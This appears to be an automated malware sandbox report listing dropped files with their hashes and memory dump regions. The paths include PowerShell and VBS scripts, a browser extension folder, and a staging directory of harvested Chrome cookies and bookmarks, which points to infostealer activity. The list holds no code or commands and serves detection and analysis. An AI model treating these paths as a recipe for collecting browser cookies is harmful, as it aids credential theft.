SHA1 36bbc7ca3d998bfb1edc2ff8a3635553f96ca570
SHA256 341c33514c627501026c3e5b9620cf0d9f482ab66b10a7e0fb112c7620b15600
SHA512 55271935e18ac27c753431af86a7dcd1f4a768adef1b593ba8e218da34856a5f9faf9819a3ecce3f21f0607ba95100c5cb18cd1a7138ec563090d0391ad5b52d

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\sr.pak

MD5 8f58b2463e8240ef62e651685e1f17d8
SHA1 6c9f302aed807a67f6b93bcb79577397a5ad3cf7
SHA256 5a55320d6953efb5b565893e32e01f6dae781a16460df5502c8ba012c893edfd
SHA512 6076d43a73d5fa5192cbe597e018b268cfdc7efb94a6cb45dad5b0da9c3abf68aaf2ea06f3ad650b28a993605917b6d356339d79f8dd6962d2c40dbf4653ef83

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\tr.pak

MD5 55e06cd9356d0fb6f99932c2913afc92
SHA1 aa5c532ddb3f80d2f180ad62ce38351e519a5e45
SHA256 afcbf02420dc724059f70d1dc6ffa51f5dd75136d9e1e8671d92d5d14955edf9
SHA512 813c180cb1aa205034497be5fc8a631ff117e5ed17cdf0ac59b7569d74d849b385852a15bbadd3146f942c58bab80d94bf0980d13ca4b4424d1cb1df0cb1a2cd

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\ur.pak

MD5 861ffd74ae5b392d578b3f3004c94ce3
SHA1 8a4a05317a0f11d9d216b3e53e58475c301d7ea5
SHA256 b9f22a23368bf1e21f3085583ecb775cce8045176721ff6ae798b06bd2810dbc
SHA512 52ede35b7ed1fb6e51b18e450b95c3245d326f2afda646e3642ee68b714dcf9a726afe32e2759e9ea87a104f4a59e6fc2c60b3275aad8332ae1c626231e6747b

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\zh-TW.pak

MD5 f466116c7ce4962fe674383d543c87f6
SHA1 f65bf0dc1f1b15c132674fb8ff540f7d2afe1d6e
SHA256 ff3a294fd1afb1fa7aaf53fbc4396643a12ed132633c5c86f14c16b88fa94a7b
SHA512 4851a08069fcac75e4051e53d4526789bfe6c393ab963e8263803bbf6e96cb150e9ba741650efb5ee500e8a757d8512eb17dc268cec1ab6fd3acfac62f7da27d

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\zh-CN.pak

MD5 3210460a24f2e2a2edd15d6f43abbe5f
SHA1 608ff156286708ed94b7ae90c73568d6042e2dbd
SHA256 0f8d42d7f0b0b01aafad6ae79f0bd0ca518b2db94287b09df088bc093f15f605
SHA512 f97427dba4217e01a7ed395c453d03dda4f2258cba589258da0eacfde427bf442cddef541a23e7782914433e70a9623e904a5070deba9f9d50dda20732eb5e86

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\vi.pak

MD5 4076d3c0c0e5f31cf883198c980d1727
SHA1 db51b746216ea68803c98d7c1a5a2b45944359f3
SHA256 f1458c4ce4ca708e849eb0c68a5157360ef003f3a9c95628d5ca12ada303b379
SHA512 80e4e960218f7d84423124c34352251411baf008e821a344a0b6c2e7f1483694010f28b7de21c7e2c69abb4ec92e0d9cbddeed6279b90c47245f4cbc500cdb77

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\uk.pak

MD5 381cb33c2d4fd0225c5c14447e6a84e0
SHA1 686b888228f6dd95ade94fee62eb1d75f3e0fc93
SHA256 c2a6b16abeab6e18276bc1636555e93218763b9c99cacd0b42481b35e3a11820
SHA512 f7a2828aa4cd85f07a5d66832f247f70951abf34f81a282dc41ec51875ba70d940353d010b605c56cc59bee47309aa311099d4e6ebd17f3c1538521d0cddf4b6

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\th.pak

MD5 4917873d8118906bdc08f31afb1ea078
SHA1 49440a3b156d7703533367f8f13f66ec166db6e9
SHA256 d051b400096922089f6daa723fac18c9640ba203b2879aac4ca89b05738dd32d
SHA512 30e6446bad54b86be553fa293c7a92ec221adb54b99624ed69702df75347a98697158041a45f77ece4e7ed0fda41306ef21eb27981f24f0a4e42e8306175a88e

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\te.pak

MD5 17b858cf23a206b5822f8b839d7c1ea3
SHA1 115220668f153b36254951e9aa4ef0aa2be1ffc4
SHA256 d6180484b51aacbf59419e3a9b475a4419fb7d195aea7c3d58339f0f072c1457
SHA512 7b919a5b451ec2ba15d377e4a3a6f99d63268e9be2865d674505584eed4fa190eaae589c9592276b996b7ce2fdfae80fda20feff9ea9adbb586308dfd7f12c2a

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\ta.pak

MD5 5f80c9da0c09491c70123581a41f6dad
SHA1 3fc9560a954271cf09aaa54eec34963c72c06e85
SHA256 30658d99d753946e9c9c02094c89be25b710db77251df6cd1a8839c29de5f884
SHA512 072c5db7fe1eb9e6c270d0e9b439cf84ebb3dc374d4f01f01f9341030883f2d6d9c6970fb6ef14bf96fccb51eade9ca762f396f89ba1d3df1230dda68557fd4a

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\sw.pak

MD5 59ff4e16b640ef41100243857efdd009
SHA1 f712b2d39618ffadcf68d1f2ab5a76da5be14d74
SHA256 c18a209f8ec3641c90ea8ced5343f943f034e09c8e75466e24dcabc070d08804
SHA512 0e721a6cbf209ac35272ad292b2e5000d4e690062ddb498dbf6e8e6ee5f6e86d034a7303a46c2b85750245381c78efafc416ead13c1fe0ee5ec6088dd66adca2

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\sv.pak

MD5 e4c9ced1a36ea7b71634e4df9618804f
SHA1 c966c8eb9763a9147854989ea443c6be0634db27
SHA256 e5cccdb241938f4a6b9af5a245abe0e0218c72e08a73db3ed0452c6ddfb9c379
SHA512 d07a4d62f22a1830d3ec44f0c347e4a7d70b35ceba126cbdc246a7b3ee7eda85e2338bab3edc7223f579964868136bb10d42c05e0e0ff9f73447b3606d9b2c4e

C:\Users\Admin\AppData\Local\Temp\184ba773-3dc3-422b-8c81-61a36d3fc007.tmp.node

MD5 2373255d323030701424f4563282972b
SHA1 5cd382285aa117f13cdfe5686d6fce9dbd6b1b08
SHA256 85c201a5cde6ea0aefd55cd1addc8df422bd99edfd714cedb38776ab490e23ec
SHA512 bacce37be95f775447e8ec0516d11d501a1b76cedc896459b3fb5791c038786ba56cb2e95da13ef9a998ebe7b0caf738aae6bb22f46fb9c117db38ca6e9ed8df

C:\Users\Admin\AppData\Local\Temp\6bc2fd44-6895-4c7b-8a0e-926eb15b8820.tmp.node

MD5 56192831a7f808874207ba593f464415
SHA1 e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA256 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512 c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

C:\Users\Admin\AppData\Local\Temp\53b140d4-437b-4d00-bfa0-fd4324d08a40.tmp.node

MD5 fbad4161a3f9b06f7ce22dfe757a9daa
SHA1 6c24e8e478c4b531bd186bb9196f5afc739b7f5b
SHA256 9f9c33a83061d85ac6b53b85d925f29dcd3223fb093174d517e5c2aeb2900fd5
SHA512 15f4e4c026f21c96daf2019f4a91a2003478e6c679cebd68ccfb83d48541f6934863bf5e92dd44b9555725f2551c633316ffe737406499cff9b0303d9f4a2d9d

memory/2688-574-0x0000016CDCD30000-0x0000016CDCD52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2vk3fmo0.3ho.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Temp\k02v5td4czh8_tezmp.ps1

MD5 8fda5f0bdeea99d6b73711eb66663fa3
SHA1 92c910fe8d4b5d72fe11fac44badca904fa5b041
SHA256 7c37cc6da9df2bdd2e3d14617425775727aa40dc7876fc8f419ac479cb477387
SHA512 cc3659d34087f7d3c297141cce5d1e70beda6a74dde1a3aa17b2191dc00bfc67fdff4a1613e8250fe59472f58799545658a331df1c05ca3e4e64cb3da9757f3b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8d460ce715a00afd56cda62e926b8b17
SHA1 3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22
SHA256 195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb
SHA512 1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969

C:\Users\Admin\AppData\Local\Temp\cpgKJgwynB302zg0MOsY\System\PKVHMXKI - 2024-06-13_001642.png

MD5 7e4eebffd3a3e621d21c670d8f820716
SHA1 8e9700a33d81ed5b28dc7c143d016d76c0042061
SHA256 3830e299a134934059dba787e9f5794d71a1511762b92eb3fd38d943b23c69e4
SHA512 ce71b2dc4ad6ed2a5afb666cbd4fdfb436993f94bbf09639ad7fb505ef645bff0f8a230fd0efb72b1efc44d235ac92a79cf7ce95b919ec39aa11afc415ee0987

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_191.zip

MD5 8310e29918ed689d395079820d4dbe59
SHA1 6cd111d501d95072610f36b94c42534bedcbc973
SHA256 d960b2c1526b8d07a78507d046783e068f0e170afa11562967cffe45ae730990
SHA512 2deb025fb711022e16df138f77eef2044dad6a1cb5b159dc69bda12edc2fa5f29f55a6681e5b8aa9c23d338e097104d5060d1ce6c7fbe186066165e5c87b6e3d

C:\Users\Admin\AppData\Local\Temp\cpgKJgwynB302zg0MOsY\Browsers\Bookmarks.txt

MD5 504550002e2aeaec8772fad83694828f
SHA1 e8f559c17d15778816846aa469dad52d2571c410
SHA256 039fdad54de24f737317055bdb5e562dafbee278bd9aaf35afbc4feb0a4fed6b
SHA512 ea219755cfab64be19375b4b74436dc05358258ff838d180478736233c694c1a8498480ff6287ad634b9b22a9dbf21f9115a789cc58093b80905a8683d5e6bfc

C:\Users\Admin\AppData\Local\Temp\cpgKJgwynB302zg0MOsY\Browsers\Chrome [ Default ] - Cookies.txt

MD5 2ab3e9987e4f862f3a38f8c96ca9fd4f
SHA1 2971f105b8080ffb276d7e7549e138ea5d4bc3c8
SHA256 1ee8c2c79957999dbc07f56a8e4fb0cde190a2c97a88f090ca82180457bf527a
SHA512 43d63d49ceca2b2a8f341556be6a98287b337e68b8ca2c8065d0ae3723ade1d184ad8c0500602d6c4bacb58f10645d0a3ccd1ec4b9b075b28b0cd218ba857dfa

C:\Users\Admin\AppData\Roaming\Z6lb7Te0yUSq.vbs

MD5 e36e35df8521d4de1538768de7208030
SHA1 abea3eefe25abecf4ea499e1d3af3d61217c8efa
SHA256 0543bb58bc6a05b3af9ebd91f2a6823591b00064c18c68010b5a7442c9fe40e2
SHA512 10fd1ded7e4ff475af9165d7687c97c26125ad59ec169fdc4e649d55ec0f69f373454cbaf43dfae92a7afcca43a70094d3d82b8747bd3e5d12523ce35df2a5d9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 73fc358d8c9ee00f6988071430ef5fa7
SHA1 cab8f4e76c0f85c029ccd00caf7725860122e760
SHA256 1836044d1363e4adaf17efbe602096be2cbaf094ab3decb0fd2e551067dfc6f6
SHA512 4f5ce853988e57e90c3c1210b2ce33d628cc8c495b06b20d3f4201141b29f6a8b5895f0bfc1ba6f3e67bd1d7d8926defe6bcb7e5418e7f4776a934e02387c8e1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2dcc306cb1a0d2dc0fd5971b059f67a0
SHA1 a25b818722bb8c84c2e8f4091c5fd563527dd14a
SHA256 97ae46cc802d3d92601c22e5edcc71ec41b9c522ec6e748dc7356beb14de2016
SHA512 c8a11fa5b58ac9256b6d6552a0228a54634f70023c93562ae3b5558374faebcc3da404e64e6cc2ed7b2d77b3505032d88d4eaf2474968aebd1e6f1fe089daeb0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a01e1ea821c8ff55a1417ec05ae3e8e0
SHA1 58d08ebebf04e239cc68c81ec549fdd91801b606
SHA256 b9eb461dada313df29c1d0afd73faa6a19bb9649f46cbb3b198bdbe99883d8a2
SHA512 c53ab72660384fed533ad810244a02384092551683506aad35b7dbc5068a5fa0ea39f5d07f37e63894608d8d87818115d41069ba7fd4b58136f6a167108359d2

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

MD5 252b4fda07550496d330d819f15ceb3e
SHA1 650584312b310219a26d5fc20cb1804bb6c4dde5
SHA256 39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d
SHA512 a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

MD5 c555604e8b6f818991e186342f856b1b
SHA1 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0
SHA256 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972
SHA512 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

MD5 f0f11cd478cc44d518c16820ede9d253
SHA1 cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512 ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

MD5 2f0a6a34d9b95bba0e3358ddd41ff2ac
SHA1 f39a9e7aeab9fe86fd9034284516de40186e6e93
SHA256 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5
SHA512 a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Roaming\salut9kB5O.ps1

MD5 28e4eda7451c625bbe806b745753f729
SHA1 d29e9b2c2ac5b10188cbae92cffba6827728543d
SHA256 da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba
SHA512 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseDesktop.exe

MD5 c883e2c769ebe56240a71260b17f1b93
SHA1 4a831d4f48f6ea81db508c2a87cf860acd17edb1
SHA256 943fd1ea44266c5d7fa02f2b292db095a4e6ba8027a1f6c73fd60d1165e63aff
SHA512 dae40d442794152285ce484b10095d11592a39cb1968bd38cc70ee23005bd1e04ad4312d7266107bdd375e10fa91ab9fd3d41d4d6ccd2268d052b343528c4376

memory/4092-955-0x00000000007E0000-0x000000000081E000-memory.dmp

memory/4092-956-0x0000000005280000-0x0000000005312000-memory.dmp

memory/4092-957-0x0000000005950000-0x0000000005EF4000-memory.dmp

memory/4092-958-0x0000000005200000-0x000000000520A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseModdingAPI.dll

MD5 9eb11041f2f11d939074e26b4b554088
SHA1 50deec7591fcc5db40939543fc9bf92109f2df05
SHA256 efa31df7ab1394092395365805f913dd023cdcd21796603f133641524fb9ad79
SHA512 2d07f40f56ae0dcaba51bc65e4617a0bfd67be13be5156fd7c2850645a461f87b97e46b2c596c21752df2aa488f6e6c329534a523bd7f88234be956b8af13bd1

memory/4092-963-0x0000000005420000-0x000000000542A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\config.ini

MD5 072813d2253b25cbcd5858226f5f17a0
SHA1 c114c97f887e56efc0941ad37ffb3f6730195eac
SHA256 cfeb29c3953c0a6ae97ab52d912311c94e0ab0df87c63ba32770ba4a714d0022
SHA512 a413ad200790b7a6f109213e73abf3eb20da0608b7b6826f5347e26b519c64581bebab3bf34c91c4aa7cc1181e73d8d824c1eec70aed07c222ef30bcc8779ee3

C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk1.mp3

MD5 db2b7cf36003b2b653df6f3ca986e007
SHA1 d61a94c7b965dec3daa6351d849fa22f646edf8b
SHA256 56a240ddfbb494a6cb5c02a1271b5cc9a79217c53b481d9d3240b4973808d65b
SHA512 3c5ba0484567bd520334837c54df160b26d3a3be952474aedf23a946369bada58241dc43a471d8e9e652e0b682599f1c5dbd03e39fe8c1f6182b806b6939eef3

memory/4092-966-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-967-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-968-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-969-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-970-0x00000000079C0000-0x00000000079D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\Assets\Sound\NotEmbedded\MudSquith.mp3

MD5 b2354d238829d09c54e272d8b4f60189
SHA1 5a2731c04c50903d41f65d9fe5528a66cbefa289
SHA256 d5281ba99731fe3c443b6b2d18960a49e74b5b407956d3e1a3cde360f86573ba
SHA512 aafbc687b5eac32fe1b4d838ab1ac88103d7f59d0b5f51519845abdd9ae37147e73143e6039719c3d06915107397e3e0a666d0cb1677cdbe05bccebea69ecaf9

memory/4092-972-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-973-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-974-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-975-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-976-0x00000000079C0000-0x00000000079D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\Assets\Sound\Music\Music.mp3

MD5 ecd3eedd1f783552e35f5bec18887ff7
SHA1 ab75a39baf2311570db5a4d90566a8746fdecc01
SHA256 652b3eb51dfc7cdd774b5c1103d69ae6c820190159d64cb477a4836096a639d7
SHA512 14351e2f978f762982fd91f9e9ce6164f02e445b9de839ed603df67f0502863d6d34551401b675bd486d568adf509543fa55ac15eb7a1d77c2fd88ced109f994

memory/4092-978-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-981-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-980-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-979-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-982-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-983-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-984-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-985-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-987-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-986-0x00000000079C0000-0x00000000079D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\Assets\Images\Memes\donald-trump-dark-face-ez43cqrgo68gks0i.gif

MD5 96817fd77b33db6f90d8972e1eaa5298
SHA1 2e6578d75778fef9c8e8e3a190b69d9498697ff0
SHA256 ef0da9c54d727d3d855759b64c55b88489fd97512cbb7d838c3393875b21572d
SHA512 8ad5e0bf0a5fd55acad2f894d49f6566fdf633c1982fe9c88423fbb332ec17af4a15246d6158e8892c7773419045f1a758f9ec4e545ad2d328a564eb48cacfde

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8fd591b5d9a08e3faa3f4c6ff1666bc0
SHA1 765bcba861cdc85c0ef6a816da42c498d4a94c35
SHA256 4d395b906878e94ab46d561123f4a25ad741ab2ca2c09cc61ef54854ee859b7b
SHA512 fc7f2ca2818772e1d36efa389ccd92277dd6ccfb5f1950d0d18a3dac691cf9b2213399d08d694a29c8f19cb4edf995f3da682e50ac78e18c447fba0af1bf3157

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1937c627875d42a0e3b95b95b9000da8
SHA1 ba6a8660cfdcd0897b73b431846c3b612bc734ab
SHA256 3a3525fe306f1939e767eb79c1a81dd798f566fa75f33d41a669e8a635c824b2
SHA512 f221e4513b76763f8a082548f7ca93651ef29f8cdd794e2a1c1744b592aea1e05aa7d9d47bfd0ffdc67430a09b2ce9cbfb053084866ae10fea1f2db12128b672

memory/4092-1277-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-1278-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-1280-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-1281-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-1279-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-2453-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-2457-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-2456-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-2455-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/4092-2454-0x00000000079C0000-0x00000000079D0000-memory.dmp